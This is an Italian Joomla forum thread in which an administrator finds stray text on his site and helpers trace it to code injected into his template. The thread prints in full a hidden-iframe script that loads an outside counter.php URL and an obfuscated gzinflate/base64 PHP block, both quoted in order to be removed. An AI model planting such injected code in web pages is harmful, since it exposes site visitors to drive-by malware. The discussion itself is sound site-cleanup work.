Joomla.it Forum
Joomla! 1.5.x (versione con supporto terminato) => Joomla! 1.5 => I Template di Joomla 1.5.x => : pioniere 28 Sep 2012, 16:35:21
-
Il sito di cui sono amministatore www.pionieri.net ha presentato un errore nella visualizzazione di una stringa in chiave html che non so togliere protreste indicami come fare ? Ve ne sarei grati.
Per rendersi conto di ciò che ho appena scritto basta collegarsi al sito.
-
ciao pioniere.
non ho capito bene se nn sai dove andare a togliere o se nn sai cosa togliere :)
dove:
estendioni -> gestione template -> il tuo template -> html
cosa:
ho dato proprio un occhiata veloce e guardando il codice quel maggiore li non dovrebbe stare li cosi credo
>=0)
-
ciao
benvenuto nel forum
allora io ho provato il template in locale e non da nessuna dicitura ,
ora neppure la vedo nel template , quella scritta non è che hai aggiunto tu qualche pezzo di codice?
qui hai messo mano se lo hai aggiunto tu e qui che fa errore , l'originale non ha questo script.
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it-it<script>var url="http://superololo.net/demo/single/counter.php?sid=1";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script>" lang="it-it" dir="ltr">
togli questo e mettilo giusto e non ingabiato alla casaccio
<script>var url="http://superololo.net/demo/single/counter.php?sid=1";if((navigator.userAgent.toLowerCase().indexOf("msie")>=0)||(navigator.userAgent.toLowerCase().indexOf("firefox")>=0)){var f=document.createElement('iframe');f.setAttribute("width","1");f.setAttribute("height","1");f.setAttribute("src",url);f.setAttribute("style","visibility: hidden; position: absolute; left: 0pt; top: 0pt;");document.getElementsByTagName("body")[0].appendChild(f)}</script>
-
X Conti 1
no giuro che non vi ho messo mano, di colpo mi è comparsa questa stringa, e non capisco il motivo. Saresti così gentile da spegare meglio ogni passaggio affinche possa ripristinare il sito te ne sarei grato. Saluti
-
zippa la cartella del tuo template e postalo che vedo se trovo quel codice.
ps:non postare l'originale xche quella funziona serve il tuo che stai usando ora.
-
L'index del l mio template comoncia e finisce così, ovvero è:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language;
#c3284d#
echo(gzinflate(base64_decode("lZHBasMwDIZfxfhSG0rSXpOmpSu7je2y29jBieV Y4NjGVtqGde++lJZdth2GLhK/PqRf2uQuYaTtUSU2JtdwSxSrssxjhBTcHIUHKjUMoczoewdlF0ZPkIpo4y6jbta8RiOEV0fsFYVUjBnSvgdPBYWncIJ0UBmELNBrOL8YwYeMwOW2WcnL5T+cwQQmnG+o/LjubBodunG4Ql0CRfDo4FqJBZqkBljI2hQZaE+UsB0JBD+hJsuXfM1/ahawt/SHmFPHl/ORflFocjBTR8zYokOaKmZRa/A1iyEjYfAVU20Obu6vmQNDFVtFqhmFeMvmgd9WeqC7j/wwvar+eXYieBv0xOXb6r1QMYLXB4tOCyM/N+X9i18=")));
#/c3284d#
?>" lang="<?php echo $this->language ?>" dir="<?php echo $this->direction; ?>">
<head>
<jdoc:include type="head" />
<?php
// no direct access
defined('_JEXEC') or die('Restricted access');
JHTML::_('behavior.mootools');
include_once ('wrapper/css.php');
?>
</head>
<body class="<?php echo $this->params->get('body_bg'); ?>">
<div id="body_inner" class="<?php echo $this->params->get('body_bg'); ?>_<?php echo $this->params->get('color'); ?>">
<?php include_once ('wrapper/top_menu.php'); ?>
<?php include_once ('wrapper/slideshow.php'); ?>
<?php include_once ('wrapper/pathway.php'); ?>
<div id="content_<?php echo $this->params->get('body_bg'); ?>">
<div id="content_top_<?php echo $this->params->get('body_bg'); ?>">
<?php include_once ('wrapper/left.php'); ?>
<?php include_once ('wrapper/sitename.php'); ?>
<div id="component">
<jdoc:include type="message" />
<jdoc:include type="component" />
</div>
</div>
</div>
<?php include_once ('wrapper/mods_bottom.php'); ?>
<?php include_once ('wrapper/zumenu.php'); ?>
</div>
</body>
</html>
-
ciao
dovrebbe essere questo da toglere
#c3284d#
echo(gzinflate(base64_decode("lZHBasMwDIZfxfhSG0rSXpOmpSu7je2y29jBieV Y4NjGVtqGde++lJZdth2GLhK/PqRf2uQuYaTtUSU2JtdwSxSrssxjhBTcHIUHKjUMoczoewdlF0ZPkIpo4y6jbta8RiOEV0fsFYVUjBnSvgdPBYWncIJ0UBmELNBrOL8YwYeMwOW2WcnL5T+cwQQmnG+o/LjubBodunG4Ql0CRfDo4FqJBZqkBljI2hQZaE+UsB0JBD+hJsuXfM1/ahawt/SHmFPHl/ORflFocjBTR8zYokOaKmZRa/A1iyEjYfAVU20Obu6vmQNDFVtFqhmFeMvmgd9WeqC7j/wwvar+eXYieBv0xOXb6r1QMYLXB4tOCyM/N+X9i18=")));
#/c3284d#
-
PERCHè DICI DOVREBBE NON NE SEI SICURO??, E SE POI TOLGO LA STRINGA E MI SANTA QUALCOS'ALTRO.
-
la risposta è scontata: fai un backup (copia dei file) prima di fare qualunque modifica...
-
Allora io devo chiederti scusa per il mio scetticismo. Sei stato bravissimo in quanto ho risolto il problema attenendomi a quanto ai scritto. Con un pò di fiducia in me stesso ho seguito quello che hai detto cancellando quella maledetta stringa e ho risolto il problema.. GRAZIE GRAZIE GRAZIE INFINITAMENTE GRAZIE.